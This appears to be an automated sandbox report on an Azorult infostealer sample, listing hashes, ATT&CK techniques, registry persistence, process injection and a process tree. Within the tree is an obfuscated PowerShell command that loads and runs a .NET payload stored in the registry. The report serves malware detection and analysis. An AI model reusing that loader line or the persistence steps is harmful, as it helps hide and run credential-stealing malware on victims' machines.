azorult | d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad

Analysis

max time kernel
149s
max time network
38s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
05-06-2024 14:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
Size

219KB
MD5

8816d5e592685626fbbfdb1b1b309d79
SHA1

650de5fc16a287c7801742ec92a2cc1ae7fcf4e8
SHA256

d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad
SHA512

323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f
SSDEEP

3072:8OJNjggfyKg0KggLV0FOhJirBwtHwwEJx5Ehl/Qs7GzrlKFHZWazC3ayZyn+q/wD:5H10CtAbe

Score

10^/10

azorult evasion infostealer persistence trojan

Malware Config

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1860 created 432	1860	powershell.EXE	5

Executes dropped EXE 2 IoCs

pid	Process
1796	$77d347a0
844	$77fc2d36

Loads dropped DLL 2 IoCs

pid	Process
2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Ygoev = "C:\\Users\\Admin\\AppData\\Roaming\\$77Ygoev.exe"	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2180 set thread context of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 set thread context of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 1860 set thread context of 448	1860	powershell.EXE	34

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 50ca1b7255b7da01	powershell.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1860	powershell.EXE
1860	powershell.EXE
448	dllhost.exe
448	dllhost.exe
448	dllhost.exe
448	dllhost.exe
448	dllhost.exe
448	dllhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
Token: SeDebugPrivilege	1860	powershell.EXE
Token: SeDebugPrivilege	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
Token: SeDebugPrivilege	1860	powershell.EXE
Token: SeDebugPrivilege	448	dllhost.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
592	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 2180 wrote to memory of 1796	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	28
PID 3020 wrote to memory of 1860	3020	taskeng.exe	30
PID 3020 wrote to memory of 1860	3020	taskeng.exe	30
PID 3020 wrote to memory of 1860	3020	taskeng.exe	30
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 2180 wrote to memory of 844	2180	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	32
PID 1860 wrote to memory of 448	1860	powershell.EXE	34
PID 1860 wrote to memory of 448	1860	powershell.EXE	34
PID 1860 wrote to memory of 448	1860	powershell.EXE	34
PID 1860 wrote to memory of 448	1860	powershell.EXE	34
PID 1860 wrote to memory of 448	1860	powershell.EXE	34
PID 1860 wrote to memory of 448	1860	powershell.EXE	34
PID 1860 wrote to memory of 448	1860	powershell.EXE	34
PID 1860 wrote to memory of 448	1860	powershell.EXE	34
PID 1860 wrote to memory of 448	1860	powershell.EXE	34
PID 448 wrote to memory of 432	448	dllhost.exe	5
PID 448 wrote to memory of 480	448	dllhost.exe	6
PID 448 wrote to memory of 488	448	dllhost.exe	7
PID 448 wrote to memory of 496	448	dllhost.exe	8
PID 448 wrote to memory of 592	448	dllhost.exe	9
PID 448 wrote to memory of 668	448	dllhost.exe	10
PID 448 wrote to memory of 752	448	dllhost.exe	11
PID 448 wrote to memory of 812	448	dllhost.exe	12
PID 448 wrote to memory of 856	448	dllhost.exe	13
PID 448 wrote to memory of 964	448	dllhost.exe	15
PID 448 wrote to memory of 236	448	dllhost.exe	16
PID 448 wrote to memory of 352	448	dllhost.exe	17
PID 448 wrote to memory of 1060	448	dllhost.exe	18
PID 592 wrote to memory of 1388	592	svchost.exe	35
PID 592 wrote to memory of 1388	592	svchost.exe	35
PID 592 wrote to memory of 1388	592	svchost.exe	35
PID 448 wrote to memory of 1388	448	dllhost.exe	35
PID 448 wrote to memory of 1100	448	dllhost.exe	19
PID 448 wrote to memory of 1160	448	dllhost.exe	20
PID 448 wrote to memory of 1192	448	dllhost.exe	21
PID 448 wrote to memory of 2344	448	dllhost.exe	24
PID 448 wrote to memory of 2352	448	dllhost.exe	25
PID 448 wrote to memory of 3020	448	dllhost.exe	29
PID 448 wrote to memory of 1860	448	dllhost.exe	30
PID 448 wrote to memory of 2316	448	dllhost.exe	31
PID 448 wrote to memory of 844	448	dllhost.exe	32

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bf8dbb63-7a7c-45c5-9b12-380edf0de9cb}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:448

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:480
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  - Suspicious use of UnmapMainImage
  - Suspicious use of WriteProcessMemory
  PID:592
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:320
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
    3⤵
    PID:1388
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:668
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:752
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:812
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1160
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:856
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {DDADB401-F6C1-4F73-B648-275608A54F4B} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1860
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:964
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:236
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:352
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1060
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1100
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2344
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2352

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:488

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:496

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1192
- C:\Users\Admin\AppData\Local\Temp\d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
  "C:\Users\Admin\AppData\Local\Temp\d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe"
  2⤵
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Users\Admin\AppData\Local\Temp\$77d347a0
    "C:\Users\Admin\AppData\Local\Temp\$77d347a0"
    3⤵
    - Executes dropped EXE
    PID:1796
- - C:\Users\Admin\AppData\Local\Temp\$77fc2d36
    "C:\Users\Admin\AppData\Local\Temp\$77fc2d36"
    3⤵
    - Executes dropped EXE
    PID:844

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-984970092-1468701873-8320633882064582688-1648279742-1113695101933362385-1211163620"
1⤵
PID:2316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\$77d347a0

Filesize
219KB

MD5
8816d5e592685626fbbfdb1b1b309d79

SHA1
650de5fc16a287c7801742ec92a2cc1ae7fcf4e8

SHA256
d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad

SHA512
323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f

Download Submit
memory/1796-4908-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/1860-4910-0x0000000001630000-0x00000000016B0000-memory.dmp

Filesize
512KB

Download
memory/1860-4911-0x0000000019F60000-0x000000001A242000-memory.dmp

Filesize
2.9MB

Download
memory/1860-4912-0x0000000000A00000-0x0000000000A08000-memory.dmp

Filesize
32KB

Download
memory/1860-5110-0x0000000001630000-0x00000000016B0000-memory.dmp

Filesize
512KB

Download
memory/1860-4934-0x0000000001600000-0x000000000162A000-memory.dmp

Filesize
168KB

Download
memory/2180-29-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-65-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-4-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-11-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-5-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-7-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-51-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-61-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-9-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-13-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-15-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-17-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-23-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-21-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-27-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-25-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-19-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-2-0x00000000746D0000-0x0000000074DBE000-memory.dmp

Filesize
6.9MB

Download
memory/2180-31-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-59-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-67-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-3-0x00000000075D0000-0x0000000007820000-memory.dmp

Filesize
2.3MB

Download
memory/2180-63-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-57-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-55-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-53-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-49-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-47-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-45-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-43-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-41-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-39-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-37-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-35-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-33-0x00000000075D0000-0x000000000781A000-memory.dmp

Filesize
2.3MB

Download
memory/2180-4890-0x00000000746D0000-0x0000000074DBE000-memory.dmp

Filesize
6.9MB

Download
memory/2180-4892-0x00000000057C0000-0x000000000580C000-memory.dmp

Filesize
304KB

Download
memory/2180-4891-0x00000000052E0000-0x000000000536C000-memory.dmp

Filesize
560KB

Download
memory/2180-4909-0x00000000746DE000-0x00000000746DF000-memory.dmp

Filesize
4KB

Download
memory/2180-4913-0x0000000005860000-0x00000000058B4000-memory.dmp

Filesize
336KB

Download
memory/2180-4933-0x00000000746D0000-0x0000000074DBE000-memory.dmp

Filesize
6.9MB

Download
memory/2180-1-0x0000000000090000-0x00000000000CC000-memory.dmp

Filesize
240KB

Download
memory/2180-0-0x00000000746DE000-0x00000000746DF000-memory.dmp

Filesize
4KB

Download